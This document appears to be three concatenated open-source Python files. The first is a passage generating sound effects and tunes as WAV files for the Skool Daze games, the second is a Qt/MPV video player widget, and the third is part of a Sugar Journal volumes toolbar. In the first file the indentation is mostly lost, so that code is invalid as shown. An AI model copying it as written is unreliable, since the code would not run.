return delays
def bts_lines2():
# BTS 29716#29818
delays = bts29836(50, 5120)
add_contention(delays, interrupts=True)
return delays
def convert_notes(notes, offset=0, tempo=1):
data = []
for note_spec in notes.split():
elements = note_spec.split('-')
beats = int(elements[1]) / float(tempo)
if elements[0] == 'R':
datum = (beats, None, None)
else:
note = NOTES[elements[0]] + offset
silence = 1 if len(elements) < 3 else 0
datum = (int(beats * 4) - silence, note, silence)
data.append(datum)
return data
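# Illustrative helper, not part of the original source: the note spec grammar
# is NOTE-BEATS[-0], where a trailing '-0' suppresses the short silence that
# is normally appended after a note, and 'R-N' denotes an N-beat rest.
def _example_note_data():
    # Returns [(7, 4, 1), (1.0, None, None), (4, 3, 0)]
    return convert_notes('C2-2 R-1 B2-1-0')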
def tune(notes):
# SD 32279
delays = []
for i, (beats, note, silence) in enumerate(notes):
if note is None:
delays.append(int(beats * 60543.5))
else:
duration, pitch = PITCH_DATA[note]
duration *= beats
duration //= 2
if i:
gap = 207 + 13 * prev_pitch + 24 * beats
if silence:
gap += 61617
delays.append(gap)
delays.extend([13 * pitch + 51] * (duration - 1))
prev_pitch = pitch
add_contention(delays)
return delays
def sd_tune():
notes = ' '.join((
'C2-2 A2-1 B2-2 G1-1',
'C2-2 A2-1 F1-2 F1-1',
'G1-2 A2-1 B2-1-0 A2-1 G1-1',
'C2-2 A2-1 F1-3',
'C2-2 A2-1 B2-1 B2-1 G1-1',
'C2-2 A2-1 F1-3',
'G1-1 G1-1 A2-1 B2-1 A2-1 G1-1',
'C2-2 A2-1 F1-3'
))
return tune(convert_notes(notes))
def all_shields():
notes = ' '.join((
'B2-1 B2-1 B2-1 C2-1 D2-2 C2-2',
'B2-1 D2-1 C2-1 C2-1 B2-3 R-4',
'B2-1 B2-1 B2-1 C2-1 D2-2 C2-2',
'B2-1 D2-1 C2-1 C2-1 B2-3 R-4',
'C2-1 C2-1 C2-1 C2-1 G1-2 G1-2',
'C2-1 B2-1 A2-1 G1-1 F1-4',
'B2-1 B2-1 B2-1 C2-1 D2-2 C2-2',
'B2-1 D2-1 C2-1 C2-1 B2-4'
))
return tune(convert_notes(notes))
def bts_tune():
notes = ' '.join((
'D2-2 F1-4 G1-2 B2-6 C2-2 D2-1 D2-3 D2-4 D2-8',
'F1-2 F1-4 G1-2 B2-4 B2-4 G1-4 F1-8',
'F1-4-0 D2-2 F1-4 G1-2 B2-6 C2-2 D2-1 D2-3 D2-4 D2-8',
'F2-6 D2-2 C2-4 D2-4 B2-4 B2-8 B2-4-0'
))
return tune(convert_notes(notes, tempo=2))
def up_a_year():
notes = ' '.join((
'B2-1 B2-1 B2-1 B2-2 D2-1 F2-2 D2-1 B2-2',
'B2-1 C2-2 C2-1 C2-2 B2-1 A2-2 G1-1 F1-3',
'B2-1 B2-1 B2-1 B2-2 D2-1 F2-2 D2-1 B2-2',
'B2-1 C2-2 C2-1 F1-1 G1-1-0 A2-1 B2-3 B2-3'
))
return tune(convert_notes(notes))
def sdtt_tune():
notes = ' '.join((
'E1-3 D1-1 C1-2 D1-2',
'E1-2 E1-2 E1-4',
'D1-2 D1-2 D1-4',
'E1-2 G1-2 G1-4',
'E1-3 D1-1 C1-2 D1-2',
'E1-2 E1-2 E1-2 E1-2',
'D1-2 D1-2 E1-2 D1-2',
'C1-8'
))
return tune(convert_notes(notes, 3))
def sdtt_all_shields():
notes = ' '.join((
'C2-3 D2-1 C2-2 B2-2',
'A2-2 B2-2 C2-4',
'G1-2 A2-2 B2-4',
'A2-2 B2-2 C2-4',
'C2-3 D2-1 C2-2 B2-2',
'A2-2 B2-2 C2-4',
'G1-4 C2-4',
'A2-2 F1-6'
))
return tune(convert_notes(notes))
def sdtt_open_safe():
notes = ' '.join((
'D1-2 D1-2 E1-2 C1-2',
'D1-2 E1-1-0 F1-1 E1-2 C1-2',
'D1-2 E1-1-0 F1-1 E1-2 D1-2',
'C1-2 D1-2 G0-4',
'E1-2 E1-2 F1-2 G1-2',
'G1-2 F1-2 E1-2 D1-2',
'C1-2 C1-2 D1-2 E1-2',
'D1-2 C1-2 C1-4'
))
return tune(convert_notes(notes, 6))
def sdtt_up_a_year():
notes = ' '.join((
'G1-2',
'G1-4 E1-2 F1-2',
'G1-4 E1-2 G1-2',
'G1-4 E1-2 A2-2',
'G1-4 E1-2 E1-2',
'F1-2 F1-2 D1-2 D1-2',
'F1-2 F1-2 D1-2 D1-2',
'G1-2 F1-2 E1-2 D1-2',
'E1-4 C1-4'
))
return tune(convert_notes(notes, 3))
def el_tune():
notes = ' '.join((
'C1-6',
'C1-6',
'C1-4 D1-2',
'E1-6',
'E1-4 D1-2',
'E1-4 F1-2',
'G1-12',
'C2-2 C2-2 C2-2',
'G1-2 G1-2 G1-2',
'E1-2 E1-2 E1-2',
'C1-2 C1-2 C1-2',
'G1-4 F1-2',
'E1-4 D1-2',
'C1-12'
))
return tune(convert_notes(notes, 3, 4.0/3))
def el_all_shields():
notes = ' '.join((
'C1-2 C1-2 A1-2 C1-2',
'D1-2 C1-2 A1-4',
'A1-2 G0-6',
'A1-2 G0-6',
'C1-2 C1-2 A1-2 C1-2',
'D1-2 C1-2 A1-4',
'G0-4 A1-2 G0-2',
'F0-8'
))
return tune(convert_notes(notes, 7))
def el_open_safe():
notes = ' '.join((
'C1-1-0 D1-1',
'E1-2 C1-2 G0-2',
'A1-2 C1-2 G0-2',
'A1-2 C1-2 G0-2',
'A1-2 C1-2 C1-1-0 D1-1',
'E1-2 C1-2 G0-2',
'A1-2 C1-2 G0-2',
'A1-2 C1-2 D1-2',
'C1-6'
))
return tune(convert_notes(notes, 7))
def el_up_a_year():
notes = ' '.join((
'C1-2 C1-2 D1-2 E1-2',
'C1-2 E1-2 D1-2 G0-2',
'C1-2 C1-2 D1-2 E1-2',
'C1-4 B1-4',
'C1-2 C1-2 D1-2 E1-2',
'F1-2 E1-2 D1-2 C1-2',
'B1-2 G0-2 A1-2 B1-2',
'C1-4 C1-4'
))
return tune(convert_notes(notes, 6))
def btsd_tune():
notes = ' '.join((
'C1-2 C1-2 C1-2 G0-2',
'A1-2 A1-2 G0-4',
'E1-2 E1-2 D1-2 D1-2',
'C1-6 G0-2',
'C1-2 C1-2 C1-2 G0-2',
'A1-2 A1-2 G0-4',
'E1-2 E1-2 D1-2 D1-2',
'C1-8'
))
return tune(convert_notes(notes, 6))
def btsd_all_shields():
notes = ' '.join((
'E1-2 E1-1-0 E1-1 C1-2 C1-2',
'E1-2 E1-2 G1-4',
'D1-2 D1-1-0 D1-1 B1-2 B1-2',
'D1-2 D1-2 F1-4',
'E1-2 E1-1-0 E1-1 C1-2 C1-2',
'E1-2 E1-2 G1-4',
'D1-2 E1-1-0 F1-1 E1-2 D1-2',
'C1-4 C1-4'
))
return tune(convert_notes(notes, 6))
def btsd_open_safe():
notes = ' '.join((
'C1-2 C1-1-0 C1-1 C1-2 C1-1-0 C1-1',
'E1-2 G1-1-0 G1-1 E1-2 C1-2',
'D1-2 D1-1-0 D1-1 D1-2 D1-1-0 D1-1',
'B1-2 D1-1-0 D1-1 B1-2 G0-2',
'C1-2 C1-1-0 C1-1 C1-2 C1-1-0 C1-1',
'E1-2 G1-1-0 G1-1 E1-2 C1-2',
'G1-2 F1-1-0 F1-1 E1-2 D1-2',
'C1-4 C1-4'
))
return tune(convert_notes(notes, 6))
def btsd_up_a_year():
notes = ' '.join((
'A2-2 C1-1-0 C1-1 C1-2 A2-2',
'A2-2 G1-2 G1-4',
'G1-2 C1-2 C1-1-0 C1-1 G1-2',
'G1-2 F1-2 F1-4',
'A2-2 C1-1-0 C1-1 C1-2 A2-2',
'A2-2 G1-2 G1-4',
'C2-2 C2-1-0 C2-1 C2-1-0 D2-1-0 C2-1-0 B2-1',
'A2-2 F1-2 F1-4'
))
return tune(convert_notes(notes, 3))
def bts_walk(cycle):
# BTS 29012
delays = [2532] * 6
add_contention(delays, interrupts=True, cycle=cycle)
return delays
def bts_walk0():
return bts_walk(8736)
def bts_walk1():
return bts_walk(8736 * 3)
def bts_walk2():
return bts_walk(8736 * 5)
def bts_walk3():
return bts_walk(8736 * 7)
def sd_walk(cycle):
# SD 65088
delays = [2532] * 7
add_contention(delays, contention=False, interrupts=True, cycle=cycle)
return delays
def sd_walk0():
return sd_walk(8736)
def sd_walk1():
return sd_walk(8736 * 7)
def _to_bytes4(num):
return (num & 255, (num >> 8) & 255, (num >> 16) & 255, num >> 24)
def write_text(f, text):
f.write(bytearray([ord(c) for c in text]))
def write_bytes(f, data):
f.write(bytearray(data))
def write_wav(samples, fname, sample_rate):
data_length = 2 * len(samples)
with open(fname, 'wb') as f:
write_text(f, 'RIFF')
write_bytes(f, _to_bytes4(36 + data_length))
write_text(f, 'WAVE')
write_text(f, 'fmt ')
write_bytes(f, (16, 0, 0, 0)) # length of fmt chunk (16)
write_bytes(f, (1, 0)) # format (1=PCM)
write_bytes(f, (1, 0)) # channels
write_bytes(f, _to_bytes4(sample_rate)) # sample rate
write_bytes(f, _to_bytes4(sample_rate * 2)) # byte rate
        write_bytes(f, (2, 0)) # block align (channels * bytes per sample)
write_bytes(f, (16, 0)) # bits per sample
write_text(f, 'data')
write_bytes(f, _to_bytes4(data_length)) # length of data chunk
for sample in samples:
write_bytes(f, (sample & 255, sample // 256))
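# Illustrative sketch, not part of the original source: the helpers above turn
# a list of half-cycle delays (in 3.5MHz Z80 T-states) into a mono 16-bit WAV.
# A 440Hz tone needs 3500000 / (2 * 440) T-states per half-cycle.
def _demo_beep(fname='beep.wav', sample_rate=44100):
    delays = [3500000 // (2 * 440)] * 880  # 880 half-cycles ~= 1 second
    samples = delays_to_samples(delays, sample_rate, 32767)
    write_wav(samples, fname, sample_rate)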
FILES = {
'catapult': (catapult, 'common', 'catapult'),
'knocked-out': (knocked_out, 'common', 'knocked-out'),
'all-shields': (all_shields, 'skool_daze', 'all-shields'),
'sd-bell': (sd_bell, 'skool_daze', 'bell'),
'hit0': (hit0, 'skool_daze', 'hit0'),
'hit1': (hit1, 'skool_daze', 'hit1'),
'jump': (jump, 'skool_daze', 'jump'),
'sd-lines1': (sd_lines1, 'skool_daze', 'lines1'),
'sd-lines2': (sd_lines2, 'skool_daze', 'lines2'),
'shield': (shield, 'skool_daze', 'shield'),
'sd-tune': (sd_tune, 'skool_daze', 'tune'),
'sd-walk0': (sd_walk0, 'skool_daze', 'walk0'),
'sd-walk1': (sd_walk1, 'skool_daze', 'walk1'),
'bts-bell': (bts_bell, 'back_to_skool', 'bell'),
'bingo': (bingo, 'back_to_skool', 'bingo'),
'conker': (conker, 'back_to_skool', 'conker'),
'bts-lines1': (bts_lines1, 'back_to_skool', 'lines1'),
'bts-lines2': (bts_lines2, 'back_to_skool', 'lines2'),
'mouse': (mouse, 'back_to_skool', 'mouse'),
'safe-key': (safe_key, 'back_to_skool', 'safe-key'),
'sherry': (sherry, 'back_to_skool', 'sherry'),
'bts-tune': (bts_tune, 'back_to_skool', 'tune'),
'up-a-year': (up_a_year, 'back_to_skool', 'up-a-year'),
'bts-walk0': (bts_walk0, 'back_to_skool', 'walk0'),
'bts-walk1': (bts_walk1, 'back_to_skool', 'walk1'),
'bts-walk2': (bts_walk2, 'back_to_skool', 'walk2'),
'bts-walk3': (bts_walk3, 'back_to_skool', 'walk3'),
'sdtt-all-shields': (sdtt_all_shields, 'skool_daze_take_too', 'all-shields'),
'sdtt-open-safe': (sdtt_open_safe, 'skool_daze_take_too', 'open-safe'),
'sdtt-tune': (sdtt_tune, 'skool_daze_take_too', 'tune'),
'sdtt-up-a-year': (sdtt_up_a_year, 'skool_daze_take_too', 'up-a-year'),
'el-all-shields': (el_all_shields, 'ezad_looks', 'all-shields'),
'el-open-safe': (el_open_safe, 'ezad_looks', 'open-safe'),
'el-tune': (el_tune, 'ezad_looks', 'tune'),
'el-up-a-year': (el_up_a_year, 'ezad_looks', 'up-a-year'),
'btsd-all-shields': (btsd_all_shields, 'back_to_skool_daze', 'all-shields'),
'btsd-open-safe': (btsd_open_safe, 'back_to_skool_daze', 'open-safe'),
'btsd-tune': (btsd_tune, 'back_to_skool_daze', 'tune'),
'btsd-up-a-year': (btsd_up_a_year, 'back_to_skool_daze', 'up-a-year')
}
SOUNDS = {
SKOOL_DAZE: (
'catapult', 'knocked-out', 'all-shields', 'sd-bell', 'hit0', 'hit1',
'jump', 'sd-lines1', 'sd-lines2', 'shield', 'sd-tune', 'sd-walk0',
'sd-walk1'
),
BACK_TO_SKOOL: (
'catapult', 'knocked-out', 'bts-bell', 'bingo', 'conker', 'bts-lines1',
'bts-lines2', 'mouse', 'safe-key', 'sherry', 'bts-tune', 'up-a-year',
'bts-walk0', 'bts-walk1', 'bts-walk2', 'bts-walk3'
),
SKOOL_DAZE_TAKE_TOO: (
'catapult', 'knocked-out', 'sd-bell', 'hit0', 'hit1', 'jump',
'sd-lines1', 'sd-lines2', 'shield', 'sd-walk0', 'sd-walk1',
'sdtt-all-shields', 'sdtt-open-safe', 'sdtt-tune', 'sdtt-up-a-year'
),
EZAD_LOOKS: (
'catapult', 'knocked-out', 'sd-bell', 'hit0', 'hit1', 'jump',
'sd-lines1', 'sd-lines2', 'shield', 'sd-walk0', 'sd-walk1',
'el-all-shields', 'el-open-safe', 'el-tune', 'el-up-a-year'
),
BACK_TO_SKOOL_DAZE: (
'catapult', 'knocked-out', 'bts-bell', 'bingo', 'conker', 'bts-lines1',
'bts-lines2', 'mouse', 'safe-key', 'sherry', 'bts-walk0', 'bts-walk1',
'bts-walk2', 'bts-walk3', 'btsd-all-shields', 'btsd-open-safe',
'btsd-tune', 'btsd-up-a-year'
)
}
def create_sounds(game, odir, verbose=True, force=False, sample_rate=44100, max_amplitude=65536):
wrote_wavs = False
for sound in SOUNDS[game]:
delays_f, subdir, fname = FILES[sound]
sounds_dir = os.path.join(odir, subdir)
if not os.path.isdir(sounds_dir):
os.makedirs(sounds_dir)
wav = os.path.join(sounds_dir, fname + '.wav')
if force or not os.path.isfile(wav):
if verbose:
print('Writing {0}'.format(wav))
samples = delays_to_samples(delays_f(), sample_rate, max_amplitude)
write_wav(samples, wav, sample_rate)
wrote_wavs = True
if verbose and not wrote_wavs:
print("All sound files present")
|
skoolkid/pyskool
|
pyskool/skoolsound.py
|
Python
|
gpl-3.0
| 18,865
|
#!/usr/bin/env python3
import functools
from nxtools import logging, log_traceback
from .utils import (
Qt,
QWidget,
QSlider,
QTimer,
QHBoxLayout,
QVBoxLayout,
QIcon,
RegionBar,
TimecodeWindow,
get_navbar,
)
try:
from .mpv import MPV
has_mpv = True
except OSError:
has_mpv = False
log_traceback()
logging.warning(
"Unable to load MPV libraries. Video preview will not be available."
)
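# Null-object stand-in for MPV: it accepts the same calls as the real player
# but does nothing, so the rest of the UI keeps working without video preview.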
class DummyPlayer:
def property_observer(self, *args):
return lambda x: x
def __setitem__(self, key, value):
return
def __getitem__(self, key):
return
def play(self, *args, **kwargs):
pass
def seek(self, *args, **kwargs):
pass
def frame_step(self, *args, **kwargs):
pass
def frame_back_step(self, *args, **kwargs):
pass
class VideoPlayer(QWidget):
def __init__(self, parent=None, pixlib=None):
super(VideoPlayer, self).__init__(parent)
self.pixlib = pixlib
self.markers = {}
self.video_window = QWidget(self)
self.video_window.setStyleSheet("background-color: #161616;")
if not has_mpv:
self.player = DummyPlayer()
else:
try:
self.player = MPV(
keep_open=True, wid=str(int(self.video_window.winId()))
)
except Exception:
log_traceback(handlers=False)
self.player = DummyPlayer()
self.position = 0
self.duration = 0
self.mark_in = 0
self.mark_out = 0
self.fps = 25.0
self.loaded = False
self.duration_changed = False
self.prev_position = 0
self.prev_duration = 0
self.prev_mark_in = 0
self.prev_mark_out = 0
#
# Displays
#
self.mark_in_display = TimecodeWindow(self)
self.mark_in_display.setToolTip("Selection start")
self.mark_in_display.returnPressed.connect(
functools.partial(self.on_mark_in, self.mark_in_display)
)
self.mark_out_display = TimecodeWindow(self)
self.mark_out_display.setToolTip("Selection end")
self.mark_out_display.returnPressed.connect(
functools.partial(self.on_mark_out, self.mark_out_display)
)
self.io_display = TimecodeWindow(self)
self.io_display.setToolTip("Selection duration")
self.io_display.setReadOnly(True)
self.position_display = TimecodeWindow(self)
self.position_display.setToolTip("Clip position")
self.position_display.returnPressed.connect(
functools.partial(self.seek, self.position_display)
)
self.duration_display = TimecodeWindow(self)
self.duration_display.setToolTip("Clip duration")
self.duration_display.setReadOnly(True)
#
# Controls
#
self.timeline = QSlider(Qt.Horizontal)
self.timeline.setRange(0, 0)
self.timeline.sliderMoved.connect(self.on_timeline_seek)
self.region_bar = RegionBar(self)
self.navbar = get_navbar(self)
#
# Layout
#
bottom_bar = QHBoxLayout()
top_bar = QHBoxLayout()
top_bar.addWidget(self.mark_in_display, 0)
top_bar.addStretch(1)
top_bar.addWidget(self.io_display, 0)
top_bar.addStretch(1)
top_bar.addWidget(self.mark_out_display, 0)
bottom_bar.addWidget(self.position_display, 0)
bottom_bar.addWidget(self.navbar, 1)
bottom_bar.addWidget(self.duration_display, 0)
layout = QVBoxLayout()
layout.addLayout(top_bar)
layout.addWidget(self.video_window)
layout.addWidget(self.region_bar)
layout.addWidget(self.timeline)
layout.addLayout(bottom_bar)
self.setLayout(layout)
self.navbar.setFocus(True)
@self.player.property_observer("time-pos")
def time_observer(_name, value):
self.on_time_change(value)
@self.player.property_observer("duration")
def duration_observer(_name, value):
self.on_duration_change(value)
@self.player.property_observer("pause")
def pause_observer(_name, value):
self.on_pause_change(value)
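        # python-mpv invokes these observers (typically from its event thread)
        # whenever the watched property changes; they update cached state, and
        # the 40ms display timer below pushes the changes into the widgets.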
# Displays updater
self.display_timer = QTimer()
self.display_timer.timeout.connect(self.on_display_timer)
self.display_timer.start(40)
@property
def frame_dur(self):
return 1 / self.fps
    def load(self, path, mark_in=0, mark_out=0, markers=None):
        self.loaded = False
        self.markers = markers or {}
self.player["pause"] = True
self.player.play(path)
self.prev_mark_in = -1
self.prev_mark_out = -1
self.mark_in = mark_in
self.mark_out = mark_out
self.mark_in_display.set_value(0)
self.mark_out_display.set_value(0)
self.duration_display.set_value(0)
self.position_display.set_value(0)
def on_time_change(self, value):
self.position = value
def on_duration_change(self, value):
if value:
self.duration = value
self.loaded = True
else:
self.duration = 0
self.loaded = False
self.duration_changed = True
self.region_bar.update()
def on_pause_change(self, value):
if hasattr(self, "action_play"):
self.action_play.setIcon(QIcon(self.pixlib[["pause", "play"][int(value)]]))
def on_timeline_seek(self):
if not self.loaded:
return
try:
self.player["pause"] = True
self.player.seek(self.timeline.value() / 100.0, "absolute", "exact")
except Exception:
pass
def on_frame_next(self):
if not self.loaded:
return
self.player.frame_step()
def on_frame_prev(self):
if not self.loaded:
return
self.player.frame_back_step()
def on_5_next(self):
if not self.loaded:
return
self.player.seek(5 * self.frame_dur, "relative", "exact")
def on_5_prev(self):
if not self.loaded:
return
self.player.seek(-5 * self.frame_dur, "relative", "exact")
def on_go_start(self):
if not self.loaded:
return
self.player.seek(0, "absolute", "exact")
def on_go_end(self):
if not self.loaded:
return
self.player.seek(self.duration, "absolute", "exact")
def on_go_in(self):
if not self.loaded:
return
self.seek(self.mark_in)
def on_go_out(self):
if not self.loaded:
return
self.seek(self.mark_out or self.duration)
def on_mark_in(self, value=False):
if not self.loaded:
return
if value:
if isinstance(value, TimecodeWindow):
value = value.get_value()
self.seek(min(max(value, 0), self.duration))
self.mark_in = value
self.setFocus()
else:
self.mark_in = self.position
self.region_bar.update()
def on_mark_out(self, value=False):
if not self.loaded:
return
if value:
if isinstance(value, TimecodeWindow):
value = value.get_value()
self.seek(min(max(value, 0), self.duration))
self.mark_out = value
self.setFocus()
else:
self.mark_out = self.position
self.region_bar.update()
def on_clear_in(self):
if not self.loaded:
return
self.mark_in = 0
self.region_bar.update()
def on_clear_out(self):
if not self.loaded:
return
self.mark_out = 0
self.region_bar.update()
def on_clear_marks(self):
if not self.loaded:
return
self.mark_out = self.mark_in = 0
self.region_bar.update()
def seek(self, position):
if not self.loaded:
return
if isinstance(position, TimecodeWindow):
position = position.get_value()
self.setFocus()
self.player.seek(position, "absolute", "exact")
def on_pause(self):
if not self.loaded:
return
self.player["pause"] = not self.player["pause"]
def force_pause(self):
if not self.loaded:
return
if not self.player["pause"]:
self.player["pause"] = True
def update_marks(self):
i = self.mark_in
o = self.mark_out or self.duration
self.mark_in_display.set_value(i)
self.mark_out_display.set_value(o)
io = o - i + self.frame_dur
if io > 0:
self.io_display.set_value(io)
else:
self.io_display.set_value(0)
self.prev_mark_in = self.mark_in
self.prev_mark_out = self.mark_out
def on_display_timer(self):
if not self.loaded:
return
if self.position != self.prev_position and self.position is not None:
self.position_display.set_value(self.position)
self.timeline.setValue(int(self.position * 100))
self.prev_position = self.position
if self.duration != self.prev_duration and self.position is not None:
self.duration_display.set_value(self.duration)
self.timeline.setMaximum(int(self.duration * 100))
self.prev_duration = self.duration
if (
self.mark_in != self.prev_mark_in
or self.mark_out != self.prev_mark_out
or self.duration_changed
):
self.update_marks()
self.duration_changed = False
|
immstudios/firefly
|
proxyplayer/videoplayer.py
|
Python
|
gpl-3.0
| 9,818
|
# Copyright (C) 2007, 2011, One Laptop Per Child
# Copyright (C) 2014, Ignacio Rodriguez
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import logging
import os
import statvfs
from gettext import gettext as _
from gi.repository import GObject
from gi.repository import Gio
from gi.repository import GLib
from gi.repository import Gtk
from gi.repository import Gdk
import cPickle
import xapian
import json
import tempfile
import shutil
from sugar3.graphics.radiotoolbutton import RadioToolButton
from sugar3.graphics.palette import Palette
from sugar3.graphics import style
from sugar3 import env
from sugar3 import profile
from jarabe.journal import model
from jarabe.journal.misc import get_mount_icon_name
from jarabe.journal.misc import get_mount_color
from jarabe.view.palettes import VolumePalette
_JOURNAL_0_METADATA_DIR = '.olpc.store'
def _get_id(document):
"""Get the ID for the document in the xapian database."""
tl = document.termlist()
try:
term = tl.skip_to('Q').term
if len(term) == 0 or term[0] != 'Q':
return None
return term[1:]
except StopIteration:
return None
def _convert_entries(root):
"""Convert entries written by the datastore version 0.
The metadata and the preview will be written using the new
scheme for writing Journal entries to removable storage
devices.
- entries that do not have an associated file are not
converted.
- if an entry has no title we set it to Untitled and rename
the file accordingly, taking care of creating a unique
filename
"""
try:
database = xapian.Database(os.path.join(root, _JOURNAL_0_METADATA_DIR,
'index'))
except xapian.DatabaseError:
logging.exception('Convert DS-0 Journal entries: error reading db: %s',
os.path.join(root, _JOURNAL_0_METADATA_DIR, 'index'))
return
metadata_dir_path = os.path.join(root, model.JOURNAL_METADATA_DIR)
if not os.path.exists(metadata_dir_path):
try:
os.mkdir(metadata_dir_path)
except EnvironmentError:
logging.error('Convert DS-0 Journal entries: '
'error creating the Journal metadata directory.')
return
for posting_item in database.postlist(''):
try:
document = database.get_document(posting_item.docid)
        except xapian.DocNotFoundError as e:
logging.debug('Convert DS-0 Journal entries: error getting '
'document %s: %s', posting_item.docid, e)
continue
_convert_entry(root, document)
def _convert_entry(root, document):
try:
metadata_loaded = cPickle.loads(document.get_data())
    except cPickle.PickleError as e:
logging.debug('Convert DS-0 Journal entries: '
'error converting metadata: %s', e)
return
if not ('activity_id' in metadata_loaded and
'mime_type' in metadata_loaded and
'title' in metadata_loaded):
return
metadata = {}
uid = _get_id(document)
if uid is None:
return
for key, value in metadata_loaded.items():
metadata[str(key)] = str(value[0])
if 'uid' not in metadata:
metadata['uid'] = uid
filename = metadata.pop('filename', None)
if not filename:
return
if not os.path.exists(os.path.join(root, filename)):
return
if not metadata.get('title'):
metadata['title'] = _('Untitled')
fn = model.get_file_name(metadata['title'],
metadata['mime_type'])
new_filename = model.get_unique_file_name(root, fn)
os.rename(os.path.join(root, filename),
os.path.join(root, new_filename))
filename = new_filename
preview_path = os.path.join(root, _JOURNAL_0_METADATA_DIR,
'preview', uid)
if os.path.exists(preview_path):
preview_fname = filename + '.preview'
new_preview_path = os.path.join(root,
model.JOURNAL_METADATA_DIR,
preview_fname)
if not os.path.exists(new_preview_path):
shutil.copy(preview_path, new_preview_path)
metadata_fname = filename + '.metadata'
metadata_path = os.path.join(root, model.JOURNAL_METADATA_DIR,
metadata_fname)
if not os.path.exists(metadata_path):
(fh, fn) = tempfile.mkstemp(dir=root)
os.write(fh, json.dumps(metadata))
os.close(fh)
os.rename(fn, metadata_path)
logging.debug('Convert DS-0 Journal entries: entry converted: '
'file=%s metadata=%s',
os.path.join(root, filename), metadata)
class VolumesToolbar(Gtk.Toolbar):
__gtype_name__ = 'VolumesToolbar'
__gsignals__ = {
'volume-changed': (GObject.SignalFlags.RUN_FIRST, None,
([str])),
'volume-error': (GObject.SignalFlags.RUN_FIRST, None,
([str, str])),
}
def __init__(self):
Gtk.Toolbar.__init__(self)
self._mount_added_hid = None
self._mount_removed_hid = None
button = JournalButton()
button.connect('toggled', self._button_toggled_cb)
self.insert(button, 0)
button.show()
self._volume_buttons = [button]
self.connect('destroy', self.__destroy_cb)
GLib.idle_add(self._set_up_volumes)
def __destroy_cb(self, widget):
volume_monitor = Gio.VolumeMonitor.get()
volume_monitor.disconnect(self._mount_added_hid)
volume_monitor.disconnect(self._mount_removed_hid)
def _set_up_volumes(self):
self._set_up_documents_button()
volume_monitor = Gio.VolumeMonitor.get()
self._mount_added_hid = volume_monitor.connect('mount-added',
self.__mount_added_cb)
self._mount_removed_hid = volume_monitor.connect(
'mount-removed',
self.__mount_removed_cb)
for mount in volume_monitor.get_mounts():
self._add_button(mount)
def _set_up_documents_button(self):
documents_path = model.get_documents_path()
if documents_path is not None:
button = DocumentsButton(documents_path)
button.props.group = self._volume_buttons[0]
button.set_palette(Palette(_('Documents')))
button.connect('toggled', self._button_toggled_cb)
button.show()
position = self.get_item_index(self._volume_buttons[-1]) + 1
self.insert(button, position)
self._volume_buttons.append(button)
self.show()
def __mount_added_cb(self, volume_monitor, mount):
self._add_button(mount)
def __mount_removed_cb(self, volume_monitor, mount):
self._remove_button(mount)
def _add_button(self, mount):
logging.debug('VolumeToolbar._add_button: %r', mount.get_name())
if os.path.exists(os.path.join(mount.get_root().get_path(),
_JOURNAL_0_METADATA_DIR)):
logging.debug('Convert DS-0 Journal entries: starting conversion')
GLib.idle_add(_convert_entries, mount.get_root().get_path())
button = VolumeButton(mount)
button.props.group = self._volume_buttons[0]
button.connect('toggled', self._button_toggled_cb)
button.connect('volume-error', self.__volume_error_cb)
position = self.get_item_index(self._volume_buttons[-1]) + 1
self.insert(button, position)
button.show()
self._volume_buttons.append(button)
if len(self.get_children()) > 1:
self.show()
def __volume_error_cb(self, button, strerror, severity):
self.emit('volume-error', strerror, severity)
def _button_toggled_cb(self, button):
if button.props.active:
self.emit('volume-changed', button.mount_point)
def _get_button_for_mount(self, mount):
mount_point = mount.get_root().get_path()
for button in self.get_children():
if button.mount_point == mount_point:
return button
        logging.error("Couldn't find button with mount_point %r", mount_point)
return None
def _remove_button(self, mount):
button = self._get_button_for_mount(mount)
self._volume_buttons.remove(button)
self.remove(button)
self.get_children()[0].props.active = True
if len(self.get_children()) < 2:
self.hide()
def set_active_volume(self, mount):
button = self._get_button_for_mount(mount)
button.props.active = True
class BaseButton(RadioToolButton):
__gsignals__ = {
'volume-error': (GObject.SignalFlags.RUN_FIRST, None,
([str, str])),
}
def __init__(self, mount_point):
RadioToolButton.__init__(self)
self.mount_point = mount_point
self.drag_dest_set(Gtk.DestDefaults.ALL,
[Gtk.TargetEntry.new('journal-object-id', 0, 0)],
Gdk.DragAction.COPY)
self.connect('drag-data-received', self._drag_data_received_cb)
def _drag_data_received_cb(self, widget, drag_context, x, y,
selection_data, info, timestamp):
object_id = selection_data.get_data()
metadata = model.get(object_id)
file_path = model.get_file(metadata['uid'])
if not file_path or not os.path.exists(file_path):
logging.warn('Entries without a file cannot be copied.')
self.emit('volume-error',
_('Entries without a file cannot be copied.'),
_('Warning'))
return
try:
model.copy(metadata, self.mount_point)
        except IOError as e:
logging.exception('Error while copying the entry. %s', e.strerror)
self.emit('volume-error',
_('Error while copying the entry. %s') % e.strerror,
_('Error'))
class VolumeButton(BaseButton):
def __init__(self, mount):
self._mount = mount
mount_point = mount.get_root().get_path()
BaseButton.__init__(self, mount_point)
self.props.icon_name = get_mount_icon_name(mount,
Gtk.IconSize.LARGE_TOOLBAR)
# TODO: retrieve the colors from the owner of the device
self.props.xo_color = get_mount_color(self._mount)
def create_palette(self):
palette = VolumePalette(self._mount)
# palette.props.invoker = FrameWidgetInvoker(self)
# palette.set_group_id('frame')
return palette
class JournalButton(BaseButton):
def __init__(self):
BaseButton.__init__(self, mount_point='/')
self.props.icon_name = 'activity-journal'
self.props.xo_color = profile.get_color()
def create_palette(self):
palette = JournalButtonPalette(self)
return palette
class JournalButtonPalette(Palette):
def __init__(self, mount):
Palette.__init__(self, _('Journal'))
grid = Gtk.Grid(orientation=Gtk.Orientation.VERTICAL,
margin=style.DEFAULT_SPACING,
row_spacing=style.DEFAULT_SPACING)
self.set_content(grid)
grid.show()
self._progress_bar = Gtk.ProgressBar()
grid.add(self._progress_bar)
self._progress_bar.show()
self._free_space_label = Gtk.Label()
self._free_space_label.set_alignment(0.5, 0.5)
grid.add(self._free_space_label)
self._free_space_label.show()
self.connect('popup', self.__popup_cb)
def __popup_cb(self, palette):
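        # Free/total bytes come from statvfs: the block size (F_BSIZE)
        # multiplied by the available (F_BAVAIL) or total (F_BLOCKS) counts.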
